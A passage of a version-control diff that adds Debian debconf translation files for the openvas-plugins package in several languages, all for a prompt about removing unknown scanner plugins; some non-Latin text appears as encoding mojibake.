this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Im Verzeichnis /var/lib/nessus/plugins liegen einige unbekannte Plugins. " +"Wahrscheinlich haben Sie zusätzliche Plugins heruntergeladen (z. B. durch " +"das Kommando nessus-update-plugins). Momentan sind dort ${countnewplugs} " +"Plugins, die nicht vom Paket bereitgestellt werden." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Achtung: Das wird für alle weiteren Installationen bzw. Aktualisierungen " +"zutreffen bis Sie das anders einrichten. Sie sollten ablehnen, wenn Sie " +"nessus-update-plugins in Zukunft nutzen möchten." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Auch wenn Sie Plugins einer älteren Haupt-Version von Nessus (z. B. 1.x) " +#~ "herunterladen, funktionieren diese eventuell nicht richtig mit neueren " +#~ "Versionen von Nessus, deshalb ist es manchmal nötig, sie zu löschen." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/es.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,73 @@ +# +# nessus-plugins translation to spanish +# Copyright (C) 2003 Software in the Public Interest +# This file is distributed under the same license as the OpenVAS package. +# +# Changes: +# - Initial translation +# Javier Fernandez-Sanguino Peña , 2003 +# - Updated by Javier Fernández-Sanguino Peña +# +# +# Traductores, si no conoce el formato PO, merece la pena leer la +# documentación de gettext, especialmente las secciones dedicadas a este +# formato, por ejemplo ejecutando: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Equipo de traducción al español, por favor lean antes de traducir +# los siguientes documentos: +# +# - El proyecto de traducción de Debian al español +# http://www.debian.org/intl/spanish/coordinacion +# especialmente las notas de traducción en +# http://www.debian.org/intl/spanish/notas +# +# - La guía de traducción de po's de debconf: +# /usr/share/doc/po-debconf/README-trans +# o http://www.debian.org/intl/l10n/po-debconf/README-trans +# +msgid "" +msgstr "" +"Project-Id-Version: openvas-plugins 0.9.0-1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2003-12-24 19:07+0100\n" +"Last-Translator: Javier Fernandez-Sanguino Peña \n" +"Language-Team: Spanish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "Remove unknown OpenVAS plugins?" +msgstr "¿Eliminar pruebas de OpenVAS desconocidas?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"El directorio /var/lib/openvas/plugins contiene algunas pruebas de seguridad " +"desconocidas. Esto probablemente se debe a que descargó pruebas en este " +"directorio (por ejemplo, al ejecutar openvas-update-plugins). Actualmente vd. " +"tiene ${countnewplugs} prueba(s) que no están incluidas en este paquete." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Esto será aplicable a todas las instalaciones o actualizaciones que se " +"hagan de este paquete hasta que lo reconfigure. Diga 'No' si desea utilizar " +"openvas-update-plugins en el futuro." + Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/fr.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,78 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.0.9-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-01-11 15:27+0100\n" +"Last-Translator: Michel Grentzinger \n" +"Language-Team: French \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=ISO-8859-15\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Faut-il supprimer les greffons inconnus de Nessus ?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Le répertoire /var/lib/nessus/plugins contient des greffons (« plugins ») " +"inconnus. Vous avez sans doute dû télécharger des greffons supplémentaires " +"dans ce répertoire (p. ex. en exécutant nessus-update-plugins). Vous avez " +"actuellement ${countnewplugs} greffon(s) qui ne sont pas fournis par ce " +"paquet." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Note : cela s'appliquera à toutes les nouvelles installations ou mises à " +"jour de ce paquet tant que vous ne l'aurez pas reconfiguré. Vous devriez " +"refuser si vous avez l'intention d'utiliser plus tard nessus-update-plugins." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Cependant, si vous avez téléchargé des greffons pour une ancienne version " +#~ "majeure de Nessus (p. ex. pour la version 1.x), ils ne fonctionneront " +#~ "sans doute pas convenablement avec des versions plus récentes de Nessus. " +#~ "Ainsi, il est parfois recommandé de les supprimer." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/ja.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,79 @@ +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# +# Developers do not need to manually edit POT or PO files. +# +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.0.10a-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2004-04-28 03:02+0900\n" +"Last-Translator: Hideki Yamane \n" +"Language-Team: Japanese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=EUC-JP\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "ÉÔÌÀ¤Ê Nessus ¥×¥é¥°¥¤¥ó¤òºï½ü¤·¤Þ¤¹¤«?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"/var/lib/nessus/plugins ¥Ç¥£¥ì¥¯¥È¥ê¤ËÉÔÌÀ¤Ê¥×¥é¥°¥¤¥ó¤¬´Þ¤Þ¤ì¤Æ¤¤¤Þ¤¹¡£¤³¤ì" +"¤Ï¶²¤é¤¯Äɲåץ饰¥¤¥ó¤ò¥À¥¦¥ó¥í¡¼¥É¤·¤¿¤â¤Î¤È»×¤ï¤ì¤Þ¤¹(Îã: nessus-update-" +"plugins ¤ò¼Â¹Ô¤Ê¤É¤Ë¤è¤ë¤â¤Î)¡£¸½ºß¡¢¤³¤Î¥Ñ¥Ã¥±¡¼¥¸¤Ë¤Ï´Þ¤Þ¤ì¤Æ¤¤¤Ê¤¤ " +"${countnewplugs} ¸Ä¤Î¥×¥é¥°¥¤¥ó¤¬¤¢¤ê¤Þ¤¹¡£" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Ãí°Õ: ¤³¤³¤Ç¤ÎÁªÂò¤Ï¡¢ºÆÀßÄê¤ò¹Ô¤¦¤Þ¤Ç¡¢¤³¤Î¥Ñ¥Ã¥±¡¼¥¸¤Î¿·µ¬¥¤¥ó¥¹¥È¡¼¥ëµÚ¤Ó" +"¥¢¥Ã¥×¥°¥ì¡¼¥ÉÁ´¤Æ¤ËŬÍѤµ¤ì¤Þ¤¹¡£º£¸å¡¢nessus-update-plugins ¤òÍøÍѤ¹¤ë¤Ä¤â" +"¤ê¤Ç¤¢¤ì¤Ð¡¢'¤¤¤¤¤¨' ¤ÈÅú¤¨¤ëÊý¤¬Îɤ¤¤Ç¤·¤ç¤¦¡£" + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "¤·¤«¤·¡¢°ÊÁ°¤Î¥á¥¸¥ã¡¼¥Ð¡¼¥¸¥ç¥ó (¤Ä¤Þ¤ê 1.x) ¤Î Nessus ÍѤ˥ץ饰¥¤¥ó¤ò¥À" +#~ "¥¦¥ó¥í¡¼¥É¤·¤Æ¤¤¤¿¾ì¹ç¡¢¿·¤·¤¤¥Ð¡¼¥¸¥ç¥ó¤Î Nessus ¤Ç¤Ï¤³¤ì¤é¤ÏÀµ¤·¤¯Æ°ºî¤·" +#~ "¤Ê¤¤¤Î¤Ç¡¢ºï½ü¤¹¤ë¤Î¤¬¤ª¤½¤é¤¯Ë¾¤Þ¤·¤¤¤Ç¤·¤ç¤¦¡£" Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/nl.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,84 @@ +# translation of nessus-plugins_2.2.8-1_templates.po to Debian l10n Dutch +# This file is distributed under the same license as the nessus-plugins package +# +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans# +# Developers do not need to manually edit POT or PO files. +# +# Kurt De Bree , 2006 +# This is an unofficial translation +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins_2.2.8-1_templates\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2006-07-18 19:13+0200\n" +"Last-Translator: Kurt De Bree \n" +"Language-Team: Debian l10n Dutch <>\n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.9.1\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Onbekende Nessus plugins verwijderen?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"De map /var/lib/nessus/plugins bevat een aantal onbekende plugins. Dit is " +"waarschijnlijk omdat u extra plugins erin gedownload hebt (bijv. door " +"'nessus-update-plugins' uit te voeren). U heeft momenteel ${countnewplugs} " +"plugin(s) die niet door dit pakket aangeboden worden." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Merk op: Dit is van toepassing op al uw nieuwe installaties/opwaarderingen " +"van dit pakket totdat u het herconfigureert. U dient 'Nee' te antwoorden als " +"u in de toekomst van plan bent om 'nessus-update-plugins' te gebruiken." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Nochtans, als u plugins gedownload heeft voor een oudere hoofdversie van " +#~ "Nessus (bijv. van 1.x), bestaat de mogelijkheid dat deze niet behoorlijk " +#~ "werken met de nieuwere versies van Nessus. Daardoor is het soms " +#~ "aangewezen ze te verwijderen." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,71 @@ +# translation of nessus-plugins debconf to Portuguese +# Copyright (C) 2007 Américo Monteiro +# This file is distributed under the same license as the nessus-plugins package. +# +# Américo Monteiro , 2007. +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.9-1.1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2007-07-22 03:59+0100\n" +"Last-Translator: Américo Monteiro \n" +"Language-Team: Portuguese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"X-Generator: KBabel 1.11.4\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Remover plugins desconhecidos do Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"O directório /var/lib/nessus/plugins inclui alguns plugins desconhecidos. " +"Isto provavelmente porque você descarregou plugins adicionais (ex. usando " +"nessus-update-plugins). Correntemente você tem ${countnewplugs} plugin(s) os " +"quais não são fornecidos por este pacote." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Isto será aplicado a todas as suas novas instalações/actualizações " +"deste pacote até que o reconfigure. Você deverá dizer 'No' se planeia usar " +"nessus-update-plugins no futuro." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Contudo, se você descarregou plugins para uma versão principal antiga do " +#~ "Nessus (ex. para 1.x) eles podem não funcionar correctamente com novas " +#~ "versões do Nessus, então por vezes é aconselhável removê-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/pt_BR.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,71 @@ +# Brazilian Portuguese translation (nessus-plugins) +# Copyright (C) 2007 THE nessus-plugins'S COPYRIGHT HOLDER +# This file is distributed under the same license as the nessus-plugins package. +# Eder L. Marques , 2007. +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.8-1.1\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2007-03-27 01:30-0300\n" +"Last-Translator: Eder L. Marques \n" +"Language-Team: l10n Portuguese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=UTF-8\n" +"Content-Transfer-Encoding: 8bit\n" +"pt_BR utf-8\n" +"X-Generator: KBabel 1.11.4\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Remover plugins desconhecidos do Nessus?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"O diretório /var/lib/nessus/plugins inclui alguns plugins desconhecidos. " +"Isto deve-se provavelmente por que você baixou plugins adicionais nele (e.g. " +"executando nessus-update-plugins). Você atualmente tem ${countnewplugs} " +"plugin(s) que não são fornecidos por este pacote." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Nota: Isto irá se aplicar a todas as suas novas instalações/atualizações " +"deste pacote até que você o reconfigure. Você deve dizer 'Não' se você " +"planeja usar o nessus-update-plugins no futuro." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Entretanto, se você baixou plugins para uma antiga versão maior do Nessus " +#~ "(e.g. da 1.x) eles podem não funcionar corretamente com versões mais " +#~ "novas do Nessus então, às vezes, é aconselhável removê-los." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/sv.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,77 @@ +# Translators, if you are not familiar with the PO format, gettext +# documentation is worth reading, especially sections dedicated to +# this format, e.g. by running: +# info -n '(gettext)PO Files' +# info -n '(gettext)Header Entry' +# Some information specific to po-debconf are available at +# /usr/share/doc/po-debconf/README-trans +# or http://www.debian.org/intl/l10n/po-debconf/README-trans +# Developers do not need to manually edit POT or PO files. +# , fuzzy +# +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.5-3\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-09-28 19:06-0700\n" +"Last-Translator: Daniel Nylander \n" +"Language-Team: Swedish \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=iso-8859-1\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Radera okända Nessus plugins?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"Mappen /var/lib/nessus/plugins inkluderar ett antal okända plugins. Det är " +"antagligen för att du laddade ner ytterligare plugins (som att köra nessus-" +"update-plugins kommandot). Du har för närvarande ${countnewplugs} plugins " +"som inte är inkluderat i detta paket." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Notera: Detta gäller för alla dina nya installationer/uppgraderingar av " +"detta paket (tills du konfigurerar om det). Du borde säga 'Nej' om du " +"planerar att använda nessus-update-plugins i framtiden." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Om du laddar ner plugins anpassade för en äldre version av Nessus (till " +#~ "exempel 1.x) kommer de antagligen inte att fungera bra med nyare " +#~ "versioner av Nessus. Därför är det ibland rekommenderat att radera dom." Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/templates.pot 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,42 @@ +# SOME DESCRIPTIVE TITLE. +# Copyright (C) YEAR THE PACKAGE'S COPYRIGHT HOLDER +# This file is distributed under the same license as the PACKAGE package. +# FIRST AUTHOR , YEAR. +# +#, fuzzy +msgid "" +msgstr "" +"Project-Id-Version: PACKAGE VERSION\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE\n" +"Last-Translator: FULL NAME \n" +"Language-Team: LANGUAGE \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=CHARSET\n" +"Content-Transfer-Encoding: 8bit\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "Remove unknown OpenVAS plugins?" +msgstr "" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" Added: trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po =================================================================== --- trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po 2009-10-06 16:45:43 UTC (rev 5407) +++ trunk/openvas-packaging/openvas-plugins/debian/trunk/debian/po/vi.po 2009-10-06 22:38:55 UTC (rev 5408) @@ -0,0 +1,71 @@ +# Vietnamese translation for nessus-plugins. +# Copyright © 2005 Free Software Foundation, Inc. +# Clytie Siddall , 2005. +# +msgid "" +msgstr "" +"Project-Id-Version: nessus-plugins 2.2.4-2\n" +"Report-Msgid-Bugs-To: jfs at debian.org\n" +"POT-Creation-Date: 2007-10-31 22:06+0100\n" +"PO-Revision-Date: 2005-06-26 15:35+0930\n" +"Last-Translator: Clytie Siddall \n" +"Language-Team: Vietnamese \n" +"MIME-Version: 1.0\n" +"Content-Type: text/plain; charset=utf-8\n" +"Content-Transfer-Encoding: 8bit\n" +"Plural-Forms: nplurals=1; plural=0\n" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "Remove unknown Nessus plugins?" +msgid "Remove unknown OpenVAS plugins?" +msgstr "Loại bá» các bá»™ cầm phít Nessus lạ không?" + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "The /var/lib/nessus/plugins directory includes some unknown plugins. This " +#| "is probably because you downloaded additional plugins into it (e.g. by " +#| "running nessus-update-plugins). You currently have ${countnewplugs} plugin" +#| "(s) which are not provided by this package." +msgid "" +"The /var/lib/openvas/plugins directory includes some unknown plugins. This " +"is probably because you downloaded additional plugins into it (e.g. by " +"running openvas-update-plugins). You currently have ${countnewplugs} plugin" +"(s) which are not provided by this package." +msgstr "" +"ThÆ° mục «/var/lib/nessus/plugins» gồm má»™t số bá»™ cầm phít lạ, rất có thể vì " +"bạn đã tải má»™t số bá»™ cầm phít thêm vào nó (v.d. bằng cách chạy lệnh «nessus-" +"update-plugins»). Hiện thá»i bạn có ${countnewplugs} bá»™ cầm phít mà gói tin " +"này không cung cấp." + +#. Type: boolean +#. Description +#: ../openvas-plugins.templates:1001 +#, fuzzy +#| msgid "" +#| "Note: This will apply to all your new installations/upgrades of this " +#| "package until you reconfigure it. You should say 'No' if you plan to use " +#| "nessus-update-plugins in the future." +msgid "" +"Note: This will apply to all your new installations/upgrades of this package " +"until you reconfigure it. You should say 'No' if you plan to use openvas-" +"update-plugins in the future." +msgstr "" +"Ghi chú: tùy chá»n này sẽ áp dụng vào má»i việc cài đặt/cập nhật gói tin này, " +"cho đến khi bạn cấu hình lại nó. Vì vậy bạn nên nói «Không» nếu bạn định sá»­ " +"dụng lệnh «nessus-update-plugins» trong tÆ°Æ¡ng lai." + +#~ msgid "" +#~ "However, if you downloaded plugins for an older Nessus major version (e." +#~ "g. from 1.x) they might not work properly with newer versions of Nessus, " +#~ "so it's sometimes advisable to remove them." +#~ msgstr "" +#~ "Tuy nhiên, 